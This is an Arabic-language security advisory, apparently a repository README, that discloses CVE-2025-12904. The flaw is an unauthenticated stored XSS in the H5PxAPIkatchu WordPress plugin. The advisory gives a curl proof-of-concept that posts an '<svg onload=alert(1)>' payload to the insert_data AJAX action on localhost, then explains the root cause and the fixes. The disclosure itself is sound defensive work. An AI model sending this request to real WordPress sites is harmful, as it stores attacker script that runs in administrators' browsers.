
إفصاح عن CVE-2025-12904
إفصاح عن CVE-2025-12904
يكشف هذا المستودع عن ثغرة اكتُشفت في SNORDIAN's H5PxAPIkatchu <= 0.4.16، وهي إضافة WordPress طوّرها otacke.
| CVE ID | النوع | المكوّن | التأثير |
|---|---|---|---|
| CVE-2025-12904 | برمجة نصية عبر المواقع (XSS) مخزنة بدون مصادقة عبر insert_data | class-table-view.php | يمكن للمهاجم المُصادَق تنفيذ JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※ إذا لم يكن المعرّف (id) داخل الكائن موجودًا، فسيفشل الطلب.
دالة insert_data() لم تكن تجري أي فحوصات للصلاحيات، مما سمح بحفظ مدخلات خبيثة بدون مصادقة. علاوةً على ذلك، كانت هذه الإدخالات تُعرض بدون ترميز (unescaped) على واجهة الإدارة.
insert_data() الدالة current_user_can لمنع التنفيذ غير المصرح به.esc_html($value) بدلاً من echo $value، يمكنك منع تنفيذ XSS.كان إنشاء PoC صعبًا جدًا.
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
أهدرت وقتًا طويلًا في إعادة إنتاج هذا الجزء. أتمنى أن أتقن استخدام أوامر curl أكثر. وبالمناسبة، هذا المكوّن الإضافي... هل كل شيء على ما يرام؟ خاصةً الاسم، أليس كذلك؟
الاسم: MooseLove
الدور: باحث أمني مستقل / صيّاد ثغرات
التواصل: متاح عند الطلب
يُقدَّم هذا التقرير الاستشاري للتوعية الأمنية العامة، وهو مجاني للمشاركة مع الإشارة إلى المصدر.